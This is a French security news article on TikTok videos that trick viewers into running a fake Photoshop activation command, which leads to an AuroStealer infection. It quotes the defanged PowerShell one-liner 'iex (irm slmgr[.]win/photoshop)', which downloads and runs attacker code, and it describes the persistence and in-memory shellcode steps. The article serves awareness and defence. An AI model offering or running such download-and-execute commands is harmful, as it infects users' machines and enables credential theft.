TikTok : la nouvelle plateforme favorite des cybercriminels pour diffuser des malwares
Lysandre Beauchêne
Les vidéos TikTok : un nouveau vecteur d’attaque inquiétant
En 2025, les cybercriminels ont trouvé un nouveau terrain de prédilection pour leurs attaques : TikTok. Selon les derniers rapports de sécurité, cette plateforme de partage vidéo, extrêmement populaire auprès des jeunes et des professionnels créatifs, est devenue un canal privilégié pour distribuer des logiciels malveillants. Les techniques employées sont particulièrement sophistiquées, exploitant à la fois la confiance des utilisateurs dans le contenu et des failles dans les comportements numériques. Ces campagnes malveillantes ont déjà infecté des milliers d’utilisateurs à travers le monde, avec des conséquences parfois désastreuses pour la sécurité des données personnelles et professionnelles.
Comment les attaquants exploitent la popularité de TikTok
Les auteurs de ces campagnes malveillantes comprennent parfaitement les mécanismes psychologiques qui animent les utilisateurs de TikTok. En créant des vidéos engageantes et prometteuses, ils parviennent à générer un engagement massif, comme en témoigne l’exemple d’une vidéo promotionnelle pour une activation “gratuite” de Photoshop qui a déjà reçu plus de 500 “likes”. Ces contenus exploitent des besoins courants : accès gratuit à des logiciels payants, astuces de productivité, ou solutions à des problèmes techniques fréquents. La viralité inhérente à TikTok permet à ces campagnes de se propager rapidement, atteignant un public bien plus large que les méthodes traditionnelles.
La diffusion de malwares via les plateformes de réseaux sociaux représente 32% des nouvelles menaces identifiées en 2025, contre seulement 18% il y a deux ans, selon une étude récente de l’ANSSI.
L’exemple concret de la fausse activation Photoshop
L’un des exemples les plus frappants de cette menace émergente est la série de vidéos TikTok prétendant offrir un activation gratuite de Photoshop. Dans ces vidéos, les créateurs prétendent partager un “simple script” permettant d’utiliser le logiciel Adobe sans licence. L’instruction donnée aux spectateurs est d’exécuter dans PowerShell la commande suivante : iex (irm slmgr[.]win/photoshop). Cette apparence innocente cache en réalité un code malveillant sophistiqué qui, une fois exécuté, ouvre la porte à une infection complète du système.
Dans la pratique, cette technique s’apparente à la stratégie ClickFix analysée par Microsoft en août 2025, où les attaquants utilisent des scripts PowerShell pour contourner les défenses traditionnelles. L’exécution de cette commande initiale déclenche une cascade d’actions malveillantes, allant du vol d’informations à l’installation persistante de logiciels espions sur l’appareil infecté.
Le mécanisme technique des campagnes malveillantes sur TikTok
L’ingénierie sociale derrière ces vidéos
Les campagnes malveillantes sur TikTok reposent sur des techniques d’ingénierie sociale particulièrement habiles. Les créateurs de ces vidéos exploitent plusieurs biais cognitifs des utilisateurs :
- La crédulité face aux “astuces” techniques partagées sur les réseaux sociaux
- La désir d’accéder à des logiciels premium sans coût
- La tendance à suivre aveuglément les instructions dans des tutoriels
- La confiance dans le contenu populaire (les vidéos avec le plus d’engagement)
- L’ignorance des risques associés à l’exécution de code non vérifié
Ces campagnes ciblent spécifiquement des publics techniquement moins avancés, qui ne réalisent pas les dangers potentiels des instructions fournies. La nature visuelle et engageante de TikTok facilite la dissimulation de ces intentions malveillantes derrière un contenu apparemment inoffensif et même utile.
Le code PowerShell malveillant : analyse technique
Le cœur de ces attaques réside dans l’utilisation de scripts PowerShell, un outil légitime mais fréquemment détourné par les attaquants. Dans l’exemple de la fausse activation Photoshop, la commande iex (irm slmgr[.]win/photoshop) exécute plusieurs opérations malveillantes :
irm(Invoke-RestMethod) télécharge du contenu depuis une URL contrôlée par l’attaquantiex(Invoke-Expression) exécute ce contenu comme du code PowerShell- Le code téléchargé a un score de seulement 17/63 sur VirusTotal, indiquant que de nombreux moteurs antivirus ne le détectent pas
Ce premier segment malveillant télécharge ensuite une série de composants supplémentaires, chacun avec des fonctions spécifiques dans l’infrastructure de l’attaque. La modularité de ces malwares permet aux attaquants d’ajuster leur charge utile en fonction des défenses rencontrées, augmentant ainsi leur taux de succès.
Les différentes étapes du malware : de l’infection au vol de données
Une fois le premier script exécuté, le malware déployé suit une progression méthodique pour prendre le contrôle complet du système :
Installation persistante : Le malware crée une tâche planifiée qui s’exécutera au prochain démarrage de l’ordinateur, garantissant sa persistance même après un redémarrage. Pour éviter d’éveiller les soupçons, il utilise des noms de tâches apparemment légitimes comme “MicrosoftEdgeUpdateTaskMachineCore” ou “GoogleUpdateTaskMachineCore”.
Téléchargement du principal malware : Le composant “updater.exe” (SHA256: 58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8) est identifié comme un AuroStealer, un malware conçu spécifiquement pour voler les informations d’identification stockées dans les navigateurs et autres applications.
Exécution d’un second payload : Le malware télécharge et exécute “source.exe” (SHA256: db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011), qui met en œuvre une technique particulièrement sophistiquée : la compilation de code à la volée.
Injection de shellcode en mémoire : Le code compilé dynamiquement utilise des fonctions Windows pour allouer de la mémoire, y copier du shellcode malveillant, puis l’exécuter directement dans la mémoire sans écrire de fichier sur le disque, ce qui rend la détection plus difficile.
Cette architecture en plusieurs étapes permet au malware d’échapper aux analyses statiques et de contourner de nombreuses défenses de sécurité traditionnelles.
Les conséquences pour les utilisateurs et les entreprises
Les risques liés à ces campagnes d’ phishing
Les infections résultant de ces campagnes TikTok peuvent avoir des conséquences désastreuses pour les victimes. Outre le vol direct d’informations d’identification, ces malwares installent souvent d’autres composants malveillants, créant une infrastructure complète pour les opérations des attaquants. Les entreprises sont particulièrement vulnérables, car un seul employé infecté peut compromettre l’ensemble du réseau d’entreprise.
Selon une étude menée par l’ANSSI en 2025, le coût moyen d’une infection par malware avancé pour une entreprise française s’élève à 140 000 euros, incluant les pertes directes, les coûts de remédiation et l’impact sur la réputation. Pour les particuliers, les conséquences sont tout aussi graves, allant du vol d’identité à l’accès non autorisé aux comptes bancaires et aux réseaux sociaux.
L’impact sur la sécurité des données personnelles
Les campagnes de malwares diffusées via TikTok représentent une menace directe pour la vie privée des utilisateurs. Une fois infecté, un appareil peut devenir une source constante de fuites d’informations :
- Vol de mots de passe et d’informations d’identification
- Capture de frappes au clavier
- Accès aux caméras et microphones
- Surveillance des activités en ligne
- Vol de documents sensibles
Les attaquants peuvent ensuite vendre ces informations sur les marchés du dark web ou les utiliser directement pour des fraudes. En 2025, le prix moyen d’un ensemble complet d’informations d’identification bancaires sur ces marchés noirs est estimé à 800 euros, selon le rapport annuel du Groupement des Cartes Bancaires (GCB).
Les coûts associés à une infection
Au-delà des dommages directs, une infection par malware entraîne des coûts significatifs pour les victimes :
- Coûts directs : Fraudes bancaires, vols de biens numériques, pertes de productivité
- Coûts indirects : Temps passé à sécuriser les comptes, réparer les systèmes, récupérer les données
- Coûts de réputation : Perte de confiance des clients, partenaires ou employés
- Coûts réglementaires : Amendes potentielles pour non-conformité au RGPD ou d’autres régulations
Pour les entreprises, ces coûts peuvent s’accumuler rapidement. Une étude récente de l’ANSSI a révélé que 65% des PME ayant subi une infection grave par malware ont fermé leurs portes dans les 18 mois suivant l’incident.
Comment se protéger face à cette menace émergente
Les bonnes pratiques pour les utilisateurs de TikTok
Face à cette menace évolutive, plusieurs mesures de protection peuvent être adoptées par les utilisateurs de TikTok :
- Ne jamais exécuter de code provenant de vidéos ou de commentaires, quelle qu’en soit la promesse
- Vérifier toujours l’authenticité des tutoriels techniques en consultant des sources officielles
- Maintenir à jour les systèmes d’exploitation et les logiciels pour bénéficier des dernières protections
- Utiliser des solutions de sécurité réputées et les maintenir à jour
- Activer les fonctionnalités de protection intégrées aux systèmes d’exploitation comme Windows Defender
En pratique, il est essentiel d’adopter un esprit critique face au contenu partagé sur les réseaux sociaux, surtout lorsque celui-ci promet des solutions “miraculeuses” ou des accès gratuits à des services payants. La règle d’or reste : si cela semble trop beau pour être vrai, cela l’est probablement.
Les mesures de protection pour les entreprises
Pour les entreprises, la protection contre ces menaces nécessite une approche stratégique :
- Formation des employés : Sensibiliser régulièrement le personnel aux risques des campagnes d’ingénierie sociale
- Contrôle des applications : Mettre en place des politiques strictes concernant l’utilisation des logiciels non autorisés
- Segmentation du réseau : Limiter la propagation d’éventuelles infections en isolant les réseaux critiques
- Solutions de sécurité avancées : Déployer des outils de détection comportementale et de réponse aux incidents
- Sauvegardes régulières : Maintenir des copies de sauvegarde séparées et non connectées en permanence au réseau
L’ANSSI recommande également aux entreprises françaises de mettre en œuvre un programme de gestion des risques cybersécurité conforme au référentiel Cyber malveillant (CM), qui inclut spécifiquement des mesures pour contrer les menaces diffusées via les réseaux sociaux.
Les outils de détection et de réponse aux incidents
Pour détecter et répondre efficacement aux infections potentielles provenant de ces campagnes TikTok, plusieurs outils peuvent être déployés :
- Solutions EDR (Endpoint Detection and Response) : Pour surveiller le comportement suspect des processus
- Sandboxing : Pour analyser en toute sécurité les fichiers suspects avant leur exécution
- Solutions SIEM (Security Information and Event Management) : Pour corréler les événements de sécurité à travers le réseau
- Outils d’analyse de PowerShell : Pour détecter les scripts suspects avant leur exécution
En pratique, une combinaison de ces outils offre la meilleure protection. Par exemple, les solutions EDR modernes peuvent identifier le comportement caractéristique du code PowerShell malveillant utilisé dans ces campagnes, même si le code lui-même n’est pas connu des bases de signatures.
Conclusion : rester vigilant face à l’évolution constante des menaces
La menace représentée par les campagnes de malwares diffusées via TikTok illustre parfaitement l’évolution constante des tactiques employées par les cybercriminels. En exploitant la popularité des plateformes de réseaux sociaux et la confiance des utilisateurs, ces attaques représentent un défi majeur pour la cybersécurité en 2025. La protection efficace nécessite une approche multicouche, combinant la technologie, la formation des utilisateurs et des processus opérationnels robustes.
Face à cette menace émergente, il est essentiel d’adopter une approche proactive de la sécurité, en comprenant non seulement les techniques d’attaque mais aussi les motivations des attaquants. La vigilance reste la meilleure défense : avant d’exécuter du code ou de cliquer sur des liens suspects, même sur des plateformes apparemment sûres comme TikTok, il est crucial de se poser les bonnes questions et de vérifier la légitimité du contenu partagé.
Dans un paysage cyber où chaque nouvelle plateforme technologique devient rapidement une cible pour les attaquants, l’éducation et la sensibilisation continuent de jouer un rôle central dans la défense des systèmes et des données. En restant informés des menaces émergentes et en adoptant les bonnes pratiques de sécurité, utilisateurs et entreprises peuvent naviguer avec plus de confiance dans le monde numérique complexe de 2025.